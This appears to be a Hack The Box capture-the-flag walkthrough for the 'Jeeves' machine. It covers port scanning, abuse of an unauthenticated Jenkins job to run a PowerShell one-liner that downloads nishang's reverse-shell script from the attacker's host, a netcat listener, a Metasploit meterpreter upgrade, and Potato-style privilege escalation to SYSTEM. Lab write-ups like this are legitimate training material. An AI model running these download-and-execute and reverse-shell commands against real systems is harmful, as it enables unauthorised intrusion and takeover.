Jeeves

https://www.hackthebox.eu/home/machines/profile/114

Nmap

I Started off scanning all ports and then a done a more intense scan on the ports found as per below:

nmap 10.10.10.63 -p- 

PORT      STATE SERVICE
80/tcp    open  http                                                                                                                                                          
135/tcp   open  msrpc                                                                                                                                                         
445/tcp   open  microsoft-ds                                                                                                                                                  
50000/tcp open  ibm-db2                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                             
nmap 10.10.10.63 -p 80,135,445,50000 -A -T4
                                                                                                                                                                                                                                           
PORT      STATE SERVICE      VERSION                                                                                                                                                                                                       
80/tcp    open  http         Microsoft IIS httpd 10.0                                                                                                                                                                                      
| http-methods:                                                                                                                                                                                                                            
|_  Potentially risky methods: TRACE                                                                                                                                                                                                       
|_http-server-header: Microsoft-IIS/10.0                                                                                                                                                                                                   
|_http-title: Ask Jeeves                                                                                                                                                                                                                   
135/tcp   open  msrpc        Microsoft Windows RPC                                                                                                                                                                                         
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)                                                                                                                                                  
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h00m20s, deviation: 0s, median: 5h00m19s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-02T00:35:20
|_  start_date: 2020-10-01T00:50:42

I first tried enum4linux on SMB and did not get any valid hits for null session. I next moved onto port 80 whilst kicking off gobuster and nikto on port 80 and port 50000 since it has been reported as HTTP

Kicking off multiple scans on port 80 and 50000

Port 80

Port 80 directs us over to a AskJeeves web page.

Port 80

Entering a value into the field and searching produces a error page which on further inspection appears to be an image. Searching using potential SQL injections or any other search parameter produces the same result.

When viewing page source we get the following:

Selecting "jeeves.PNG" takes us to the above image. Based on this I will not be spending anymore time on port 80 as we have still not inspected port 50000.

Port 50000

Heading over to Port 50000 we land on the following page:

Port 50000

Clicking on the link takes us away to https://eclipse.org/jetty/

gobuster reveals a directory of /askjeeves/ on this port.

/askjeeves/

Looks like we have unauthenticated access to Jenkins. As we have freedom of Jenkins we can select the "create new jobs" link. From here give the project a name and select "freestyle project".

On the next screen head down to "Build" and then select "Execute Windows batch command".

On this next part we are going to use nishang Invoke-PowershellTcp to get a reverse shell on the machine.

run the following with root permissions to install nishang

sudo apt-get install nishang

After install we can find the nishang files at /usr/share/nishang/shells Start a python server in the shells directory as we will need to pull one of the files to gain shell.

Set up a netcat listener. In this example I will be using port 443.

sudo nc -lvp 80

We can now insert the following command into the Jenkins batch command box. Changing IP and port where appropriate.

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

After you have completed this save the project at the bottom of the screen and then on the following screen select "Build now"

You should notice the python server receives a GET request for the file specified with a HTTP code 200. If you have incorrectly spelt the file you will receive a code 404.

netcat should now pick up the shell and get you on the system as a low privilege account.

low privilege shell.

From here we can grab the user.txt flag before moving onto privilege escalation.

Privilege Escalation

For privilege escalation we should start with the normal system enumeration. We can run system info and run this against Windows_exploit_suggester.py.

I have covered Windows_exploit_suggester usage here if you need to know how to use it:

GitBookapp.gitbook.com

After going through the results of the python script what sticks out to us is the following exploit:

FoxGlove Security have done a fantastic write up on the exploit which can be read here.

Rotten Potato – Privilege Escalation from Service Accounts to SYSTEMfoxglovesec

We can run the command whoami /priv and see if we have any of the correct privileges to perform the exploit. the privilege SeImpersonatePrivilege will allow us to run the exploit for MS16-075. This privilege is usually given to service accounts.

We will be using metasploit for the escalation and as such we will need to upgrade our shell to a meterpreter shell. Open msfconsole and search for multi/script/web_delivery set the correct options.

Run the module and it should create some Powershell code which needs to be run on the victim machine. The web_delivery module will keep a listener open waiting for when the code is run. When we execute the code on the victim machine this should give us a meterpreter shell back (depend on the payload you selected).

Generating the payload.

Running the payload on the victim machine

After running we should receive a shell back in msfconsole.

meterpreter shell

We can now run a search for the exploit in msfconsole after back grounding our meterpreter session.

Select options 1 for the juicy exploit and set the payload options. When you have filled out the correct information run the exploit and you should land a shell as system.

NT Authority\System

From here we should be able to grab root.txt?

Or not... Looks like we will have to look elsewhere.

After some time and looking literally everywhere I could not find the root flag. I eventually turned to the HTB forums for hints and eventually came to the right answer with the command Dir /R this command allows you to view alternative datastream (ADS) files.

root flag

After retrieving root I did a little research on finding ADS files as I do not believe I would have found this without a hint. Malwarebytes have done a great blog post on the subject and have provided some good methods for over coming this.

Introduction to Alternate Data Streams | Malwarebytes LabsMalwarebytes